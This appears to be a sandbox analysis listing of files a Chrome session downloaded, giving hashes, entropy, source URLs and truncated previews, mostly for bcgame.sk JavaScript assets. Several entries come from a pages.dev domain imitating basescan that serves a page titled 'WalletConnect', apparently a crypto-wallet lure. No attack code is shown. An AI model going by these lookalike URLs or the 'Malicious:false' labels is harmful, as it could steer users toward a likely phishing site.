                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):161986
                                                                                                                                                                                                                                              Entropy (8bit):4.017200448556779
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:EuMRy99tYyTkBuBeEYPzo+SGRD2QGCqlkhBZ5eH8tG9ealBLAW+UkJVRtPR5oWW5:lpY2fHJNb6s
                                                                                                                                                                                                                                              MD5:6CB1CC2680AA64E2DBC9F6C3A24DE454
                                                                                                                                                                                                                                              SHA1:9AEF5EE45D07AA99C1A3CE2E8CE3A4817399B697
                                                                                                                                                                                                                                              SHA-256:E1128ED5139E72867D943EAECE54701FCC95BE40FA57A9B75A36C4C3A1C1AE95
                                                                                                                                                                                                                                              SHA-512:119F7FE70A334E9F065C3B2F00E2362467847E6155D56C8FDF211E5E456E4D4647AF0626A53B74B257AB1E48B38928DA3F9C5ADF978A8270DA4BAD3E905A408E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/OriginalsGames-46WI0mge.js
                                                                                                                                                                                                                                              Preview:import{bi as q,aL as z,aM as P,e as n,i as v,c as s,ai as U,h as m,aj as I,f as C,a4 as E,a as d,a8 as o,bj as B,b as V,Q as p,r as N,ar as F,x as u,G as A,l as D,aQ as O,m as c}from"./index-DD2Zk4iT.js";import{c as Q,g as R}from"./index-DH9MDtxd.js";import"./_basePropertyOf-BhSQSS-6.js";var W=C('<svg><path opacity=0.96632 d="M22.986 6.19141C26.3715 6.19141 29.1153 8.9065 29.1153 12.2566C29.1153 13.5112 28.7303 14.6776 28.0705 15.6449C27.9536 15.825 27.8196 16.006 27.6673 16.187C23.1287 21.6066 9.28124 24.4233 9.25347 24.3869C13.0105 22.1573 14.9126 19.9987 14.8465 19.9613C10.8729 22.0051 10.0608 22.8915 2.42927 23.3715C5.97533 21.1998 6.82818 20.6065 10.0608 18.1503C14.7622 14.578 16.1643 10.4369 18.6352 7.98615L18.5518 8.06851L18.7175 7.90283C19.8208 6.8436 21.3273 6.19141 22.986 6.19141ZM22.9544 7.70746C20.4155 7.70746 18.3574 9.7445 18.3574 12.2566C18.3574 14.7686 20.4155 16.8057 22.9544 16.8057C25.4933 16.8057 27.5514 14.7686 27.5514 12.2566C27.5514 9.7445 25.4933 7.70746 22.9544
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (64703)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1269427
                                                                                                                                                                                                                                              Entropy (8bit):5.759504296653748
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:JGidqoQkzUeZ37sLXWSz+NJ8BCPaj15vKLcOr:zqzCUeZ37sjWS0JzfYOr
                                                                                                                                                                                                                                              MD5:29E38D0872A7FEF225C84E15E55E1BEE
                                                                                                                                                                                                                                              SHA1:8A33EF1C6666716FFD0DEDD32025BB437E71A234
                                                                                                                                                                                                                                              SHA-256:73E5C2AA477A00E269CC40B5615B097168C558E0450FB28F6BA8BFD190CDB032
                                                                                                                                                                                                                                              SHA-512:6F0D57CAEAA30DD2E756F7810FF9B3DD7E2451AED8610D107383A3A959C5F2F1C6E4F54C08BDBE39D27B2C63E4155184790E7CD4F1E67D1768C5F16985091B65
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["assets/NoticeComment-DxlkXkhH.js","assets/_basePropertyOf-BhSQSS-6.js","assets/OriginalsGames-46WI0mge.js","assets/index-DH9MDtxd.js","assets/Contest-BCVAsTyf.js","assets/ContestList-BC0hkzon.js","assets/common-DVIU4ngr.js","assets/ContestRules-Zo7GUD_B.js","assets/Bingo.page-I1m2tVcx.js","assets/index-CMxvzQWG.js","assets/Favorite.page-DZKmwPgr.js","assets/GameEntryWrap-B0vD2mef.js","assets/Recent.page-CTN_-8od.js","assets/ThrowAndHighRolles-DADNM0eC.js","assets/index-TJYR_fED.js","assets/Block-LQQkMNS-.js","assets/discord-3fjpJq_P.js","assets/index-OFWIR-XG.js","assets/index-C-NOM3iv.js","assets/Update-CdjLVoC3.js","assets/Casino.page-BK1IC-Vp.js","assets/Providers.page-v7ZHXAmf.js","assets/Tag.page-zKV2ptps.js","assets/Themes.page-BSU31Xnu.js"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.(function(){const L=document.createElement("link").relList;if(L&&L.supports&&L.supports("modulepreload"))return;for(const H of document.querySelectorAll('link[rel="mod
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (325)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):326
                                                                                                                                                                                                                                              Entropy (8bit):5.126538413090006
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:FgTIKwoQN8GMmBw5ZELAYmJKv+nrjCuMYphnnRrBhsxlPnRxhn5cQhrEfVJhQdiF:F+YLVQJKGnrjJXxpk3B5c+Yg8H
                                                                                                                                                                                                                                              MD5:EEA9E0E74BCAD9F080807096D8E6A926
                                                                                                                                                                                                                                              SHA1:3510365AB98D0D483522DC4153260E1F4B79590A
                                                                                                                                                                                                                                              SHA-256:CBED0C4ABCB4E0DBA42886314CAC194EF3AA69DF1EE453CEB5ECF576D99B8E55
                                                                                                                                                                                                                                              SHA-512:939D2FF120A18601A564D8A3649619CF53D4AD6B83FE2317757A4E6388179847A0208DDD7C0BBC7A151B754DD52F232E9F2BBEDE22CF607C3725F3591BA010DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{d as n}from"./debounce-f7740f4e.js";import{i as l}from"./isObject-909534d5.js";var g="Expected a function";function u(t,a,r){var i=!0,e=!0;if(typeof t!="function")throw new TypeError(g);return l(r)&&(i="leading"in r?!!r.leading:i,e="trailing"in r?!!r.trailing:e),n(t,a,{leading:i,maxWait:a,trailing:e})}export{u as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (15465)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):25897
                                                                                                                                                                                                                                              Entropy (8bit):5.442514951976473
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:Fb4OxMR8/ZzsipUxhpCAc695HFxo7dHvolxPChJ1UX3ulPVXT1B3r1Olq:UuOh669/ONMxPCr1zlR1B36q
                                                                                                                                                                                                                                              MD5:A8476B6333C45F3F4FEA54FB1060F3B0
                                                                                                                                                                                                                                              SHA1:0D5C08B86C1BAC14F98039577195487686C2847C
                                                                                                                                                                                                                                              SHA-256:AB84E362522B138AC2CD90C4A289F7B28640E58152F8AC334C2495FFC896388F
                                                                                                                                                                                                                                              SHA-512:9FD26E479F21E2EA74004452C64C4744E199C97F2D42577DD624137680613359EA25C241BE1F69AE4FCC20CD510B530BA9E70D9CD2FAB912381CF7FFC1633299
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/service-worker.js
                                                                                                                                                                                                                                              Preview:try{self["workbox:core:6.6.0"]&&_()}catch{}const x=(a,...e)=>{let t=a;return e.length>0&&(t+=` :: ${JSON.stringify(e)}`),t},E=x;class l extends Error{constructor(e,t){const s=E(e,t);super(s),this.name=e,this.details=t}}const f={googleAnalytics:"googleAnalytics",precache:"precache-v2",prefix:"workbox",runtime:"runtime",suffix:typeof registration<"u"?registration.scope:""},b=a=>[f.prefix,a,f.suffix].filter(e=>e&&e.length>0).join("-"),I=a=>{for(const e of Object.keys(f))a(e)},C={updateDetails:a=>{I(e=>{typeof a[e]=="string"&&(f[e]=a[e])})},getGoogleAnalyticsName:a=>a||b(f.googleAnalytics),getPrecacheName:a=>a||b(f.precache),getPrefix:()=>f.prefix,getRuntimeName:a=>a||b(f.runtime),getSuffix:()=>f.suffix};function P(a,e){const t=e();return a.waitUntil(t),t}try{self["workbox:precaching:6.6.0"]&&_()}catch{}const O="__WB_REVISION__";function M(a){if(!a)throw new l("add-to-cache-list-unexpected-type",{entry:a});if(typeof a=="string"){const c=new URL(a,location.href);return{cacheKey:c.href,url:c
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (876)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):877
                                                                                                                                                                                                                                              Entropy (8bit):4.962536663127428
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:wjQ6KLi8NnaJSLQ0+othLXAE9OykkXYRIfObQkV:wjQ6EmOOEAXrvV
                                                                                                                                                                                                                                              MD5:B512469922DBBF718AA4BA613C106DAB
                                                                                                                                                                                                                                              SHA1:7358003399397A38F89083AF020F3AA67581E9E3
                                                                                                                                                                                                                                              SHA-256:7778428AFE2E5927859F4EB36DC74357778D7A69A8DD518B8123A53FF7A002A9
                                                                                                                                                                                                                                              SHA-512:1E084FC00A63E0CCA7150BE519F0EFB07C109C7E128AFB496F568E1ADFE89C157291FD86BC03F261E43A6903B9FFE70BD90B0DCD2B2BD53507E51657097A26A3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/solid-js-bce2a176.js
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{$DEVCOMP:a,$PROXY:r,$TRACK:t,DEV:n,ErrorBoundary:s,For:o,Index:c,Match:i,Show:l,Suspense:u,SuspenseList:d,Switch:b,batch:h,cancelCallback:p,catchError:C,children:E,createComponent:S,createComputed:f,createContext:g,createDeferred:x,createEffect:m,createMemo:R,createReaction:y,createRenderEffect:M,createResource:w,createRoot:O,createSelector:P,createSignal:T,createUniqueId:k,enableExternalSource:q,enableHydration:A,enableScheduling:D,equalFn:F,from:$,getListener:z,getOwner:B,indexArray:I,lazy:L,mapArray:V,mergeProps:_,observable:j,on:v,onCleanup:H,onError:K,onMount:U,requestCallback:W,resetErrorBoundaries:X,runWithOwner:Y,sharedConfig:G,splitProps:J,startTransition:N,untrack:Q,useContext:Z,useTransition:ee}=e.dxzurp;export{o as F,i as M,l as S,H as a,m as b,T as c,R as d,b as e,O as f,w as g,P as h,h as i,u as j,U as o,Y as r,J as s,Q as u};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (29077)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):29122
                                                                                                                                                                                                                                              Entropy (8bit):5.755803247435433
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:o/zUClhUqx5bxXty7cpaQQSn/A+WuJbwYnLvempdp0W4sDH7LMGBV1e85VV:odUqx5FXCQQSoOt1LvemtbMGBB5VV
                                                                                                                                                                                                                                              MD5:9EABD04E447B0B52D59DC97FB6C30036
                                                                                                                                                                                                                                              SHA1:6D4DC3253BCDB75FF2ABE6CB68EA5E8E0E5E872E
                                                                                                                                                                                                                                              SHA-256:C8FC0EFD4803279CFD893338C162E4DB295EF2D13552F4969BF30EF7CF62785E
                                                                                                                                                                                                                                              SHA-512:CCC0158F78AFAB86BCFE75E99692EA7E2129585E66CFEA2451C3F399966D669CCDC80EB55C23D2A245E4ADDDD16CE238F1643A0C5516547AD52BC3568AC3980E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/init-c2a95928.js
                                                                                                                                                                                                                                              Preview:import{z as t}from"./manifest-aca455c4.js";const r=`.sticky{position:sticky}.-bottom-4{bottom:-1rem}.-top-2{top:-.5rem}.bottom-28{bottom:7rem}.bottom-5{bottom:1.25rem}.left-1{left:.25rem}.left-2{left:.5rem}.left-2\\.5{left:.625rem}.left-6{left:1.5rem}.left-7{left:1.75rem}.left-9{left:2.25rem}.left-\\[14\\%\\]{left:14%}.left-\\[18\\%\\]{left:18%}.left-\\[20\\%\\]{left:20%}.left-\\[37\\%\\]{left:37%}.left-\\[53\\%\\]{left:53%}.left-\\[68\\%\\]{left:68%}.right-16{right:4rem}.right-2{right:.5rem}.right-2\\.5{right:.625rem}.right-3{right:.75rem}.right-4{right:1rem}.right-\\[-2px\\]{right:-2px}.right-\\[15\\%\\]{right:15%}.top-10{top:2.5rem}.top-12{top:3rem}.top-14{top:3.5rem}.top-2\\.5{top:.625rem}.top-24{top:6rem}.top-3\\.5{top:.875rem}.top-7{top:1.75rem}.top-8{top:2rem}.top-\\[-2px\\]{top:-2px}.top-\\[22\\%\\]{top:22%}.top-\\[26\\%\\]{top:26%}.top-\\[28\\%\\]{top:28%}.top-\\[3\\%\\]{top:3%}.top-\\[30\\%\\]{top:30%}.top-\\[47\\%\\]{top:47%}.top-\\[64\\%\\]{top:64%}.top-\\[7\\%\\]{top:7%}.t
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):32
                                                                                                                                                                                                                                              Entropy (8bit):4.226409765557392
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:H9c8GyBth19qYn:Jb39qY
                                                                                                                                                                                                                                              MD5:81F6E8824CA23F2CB80547A6469A0BEF
                                                                                                                                                                                                                                              SHA1:9B6222567D04F69E89AC78A59EBE23ED5745C772
                                                                                                                                                                                                                                              SHA-256:67DB9448F60F08A66052C364CD380F2D2EDE4DEDD0FC1B160DD098AFEFB2E380
                                                                                                                                                                                                                                              SHA-512:71A5C8E2DB54C5A297E0B799F57C368FA3133CE0075945FC3E05EDC86D072CE17AF6660518D997C3F8B4029454EB61E84CD050A37390245F7F50AC4846BD9BA5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAn0WcNEeHk8ARIFDcGhthwSEAlaBNe_WLhjZBIFDcGhthw=?alt=proto
                                                                                                                                                                                                                                              Preview:CgkKBw3BobYcGgAKCQoHDcGhthwaAA==
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1660
                                                                                                                                                                                                                                              Entropy (8bit):7.745160139064133
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:05twx8DalgPvSF7HMgbLUx4RFha0dmmErM:056OWlgIsgbgshagSM
                                                                                                                                                                                                                                              MD5:074066395A8B91AE5CAF41B3E566B24A
                                                                                                                                                                                                                                              SHA1:A0DD493C95A2033AC722409D0BBDCBC3475825D0
                                                                                                                                                                                                                                              SHA-256:6BCA948A3547919A5602A8D1062A2FDC8EA2AD68DB95E070A15FB57A531DBC4A
                                                                                                                                                                                                                                              SHA-512:1A6B00EFFAFC5608DF5E99E658A701421645E5CF0E2CE2E10D17BA263E163EC7E57220FFD38F5DCBDAE5A6ED95C5416337E498755DC6B1D3F4F00FA67B33A414
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....G<ef...hPLTE...b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~.b~..................d............i..k..v......m..e.....{........v..............q................................................z...................~..............................................X..."tRNS.....s1.N............~yjB=6.*! .{..F....IDATh...W.Q..x.......w....(..J.J.4....4{...~.y...=.kE..~...}...+.:.I&.Oh..b.D2rN:L..........C..........xD...........1..X.h..S.N.....K..n....k.C."0qR.....0F|.G.F..L...tz.a.=!<..Y.q...g8._x.....,/..G...0...!.u...V.._v./......./...~..M".-...Rw.$Ov....| k...dVv..#..Q. y.h....U. ...:6a.X..BnA.................}./.....{.....k/-..*A ......G........._+$SD.0n.r_6 ......kBt.qW.... %.l..lX..)[!....>..t......i?....I}....2....I..VC....5!.......-..$.J........{Ok. ._.bjQp.. Q>.......V..V.d....9)"8...`..1....).*....7._y.....p...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1256)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1257
                                                                                                                                                                                                                                              Entropy (8bit):5.300809342483136
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:6Vp9y0TYUzJVKno2Jt7WA6LI3U53hAvN8w:6Vp00TNzJVQpJt7B9Uvw
                                                                                                                                                                                                                                              MD5:31354E3D9F5254A3CC4F2D51816B0A18
                                                                                                                                                                                                                                              SHA1:603C3CCA8A52A6F70E09F1B4FEF3E7A1A2BF92FD
                                                                                                                                                                                                                                              SHA-256:12806FBB2E555F8A1B7CDA402D124A18FA2C98D68DCC74C3CE8083372D8465CE
                                                                                                                                                                                                                                              SHA-512:1043F1C23559365F7E9FDF687786DEAFD4360CC1C6E3BED386C91CFA01CC5C485E4BED5959ABD7FF423FA137B67FE47FDB54F31AE5BC0E2B2DA9FC56F27B8383
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{d as m}from"./solid-js-38561dfe.js";import{s as e,p as s}from"./index-3c725725.js";import{c as a}from"./createHasNewUserSpin-80b2817f.js";import{e as o,ab as n}from"./manifest-51a3674f.js";import"./web-13cf6287.js";import"./router-3828f409.js";import"./currency-format-1c532f37.js";import"./_baseGetTag-c2e287b9.js";import"./isArray-79a0be9c.js";import"./index-cb32ccd4.js";import"./table-f81aed47.js";import"./i18n-fcfac1d2.js";import"./index-96ed660e.js";import"./index-76d972f3.js";import"./http-f4555b94.js";import"./baseService-449c2e3e.js";import"./_baseFor-3fee30d6.js";import"./_MapCache-1fb5cc44.js";import"./sounds-2c4b6e58.js";import"./index-99ee4a48.js";import"./index-c0147582.js";import"./vip-413478bd.js";import"./toast-unhandle-error-992739c6.js";import"./index-adb8672d.js";import"./index-3fd48be3.js";import"./utils-189ac561.js";import"./center-loading-1eaab0a0.js";import"./animate-number-f0294c10.js";import"./localization-extend-fdb9490f.js";import"./_arrayMap-2bcec0e7.js
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
